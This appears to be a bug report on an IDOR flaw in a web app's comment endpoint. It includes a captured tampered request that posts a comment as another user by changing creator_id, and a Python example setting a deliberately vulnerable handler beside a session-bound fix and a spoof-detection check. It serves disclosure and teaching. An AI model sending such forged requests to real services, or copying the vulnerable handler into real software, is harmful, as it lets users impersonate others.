IDOR on comment  #1

@jeremybuis

Description

Steps to reproduce:

  1. Register and log in as a normal user
  2. Post a comment
  3. Intercept the request and change the creator id to another user's
  4. Resend the request as the other user

Here are the request and response showing a comment posted as another user. For reference, my user has an id of 1002.

Attack Request

```http
POST /comment HTTP/1.1
Host: 192.168.99.100:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Referer: https://192.168.99.100:8443/wall?user_id=1002
Cookie: JSESSIONID=CB39DD1389BDE85C38D86EDE670B1363
Connection: close
Upgrade-Insecure-Requests: 1

on_wall=1&creator_id=486&post_id=2892&content=Sandra Comment
```

Attack Response

```http
HTTP/1.1 302 
Location: wall?user_id=1002#2892
Content-Length: 0
Date: Thu, 26 Oct 2017 13:45:32 GMT
Connection: close
```
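The root cause in the report above is that the `/comment` handler trusts the `creator_id` field sent by the client instead of deriving authorship from the authenticated session. The following added example (not code from the reporter or from the project being reported on) shows that pattern in a framework-agnostic Python handler next to a hardened version, plus a check that flags requests whose `creator_id` disagrees with the session user, which is the signal a defender would log. The session and post tables, the cookie value and the handler names are constructed for the example; the form body is the one from the report.

```python
from dataclasses import dataclass
from urllib.parse import parse_qs

# Constructed session table: cookie value -> authenticated user id.
# The cookie value is a placeholder, not the JSESSIONID from the report.
SESSIONS = {"SESSION-PLACEHOLDER": 1002}

# Constructed post table: post_id -> id of the user whose wall holds the post.
POSTS = {2892: 1002}

# Form body exactly as sent in the reported request (user 1002's session,
# creator_id claiming to be user 486).
REPORTED_BODY = "on_wall=1&creator_id=486&post_id=2892&content=Sandra Comment"


@dataclass
class Comment:
    post_id: int
    creator_id: int
    content: str


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def vulnerable_create_comment(cookie: str, body: str) -> Comment:
    """The pattern the report describes: the creator is whoever the client claims.

    The session is only used to decide that *someone* is logged in; the
    identity written into the comment comes from the request body.
    """
    if cookie not in SESSIONS:
        raise PermissionError("not logged in")
    form = parse_form(body)
    return Comment(int(form["post_id"]), int(form["creator_id"]), form["content"])


def hardened_create_comment(cookie: str, body: str) -> Comment:
    """Authorship is bound to the session; a client-supplied creator_id is ignored.

    The handler also refuses unknown post ids so the comment cannot be
    attached to a record that does not exist.
    """
    if cookie not in SESSIONS:
        raise PermissionError("not logged in")
    user_id = SESSIONS[cookie]
    form = parse_form(body)
    post_id = int(form["post_id"])
    if post_id not in POSTS:
        raise LookupError("unknown post")
    # creator_id from the form is deliberately never read here.
    return Comment(post_id, user_id, form["content"])


def spoof_attempted(cookie: str, body: str) -> bool:
    """Detection helper: True when the body claims a creator other than the session user.

    A legitimate client built from the page never sends a mismatching value,
    so a mismatch is a tampered request worth logging and alerting on.
    """
    if cookie not in SESSIONS:
        return False
    claimed = parse_form(body).get("creator_id")
    return claimed is not None and int(claimed) != SESSIONS[cookie]


if __name__ == "__main__":
    print("vulnerable:", vulnerable_create_comment("SESSION-PLACEHOLDER", REPORTED_BODY))
    print("hardened:  ", hardened_create_comment("SESSION-PLACEHOLDER", REPORTED_BODY))
    print("spoof attempted:", spoof_attempted("SESSION-PLACEHOLDER", REPORTED_BODY))
```

With the reported body, the vulnerable handler stores the comment as user 486 while the hardened one stores it as the session user 1002 regardless of what the form says; the same check that fixes the bug (`SESSIONS[cookie]` versus the form field) doubles as the detection rule.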
